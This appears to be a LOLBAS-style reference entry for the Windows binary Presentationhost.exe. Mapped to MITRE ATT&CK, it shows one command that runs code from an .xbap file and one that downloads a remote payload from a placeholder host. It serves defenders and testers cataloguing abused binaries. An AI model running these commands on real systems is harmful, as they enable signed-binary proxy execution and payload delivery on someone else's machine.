IOC: Execution of .xbap files may not be common on production workstations
Execute
Executes the target XAML Browser Application (XBAP) file
Presentationhost.exe C:\temp\Evil.xbap
Usecase: Execute code within xbap files
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
MITRE ATT&CK®: T1218
Download
It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Presentationhost.exe https://example.com/payload
Usecase: Downloads payload from remote server
Privileges required: User
OS: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
MITRE ATT&CK®: T1105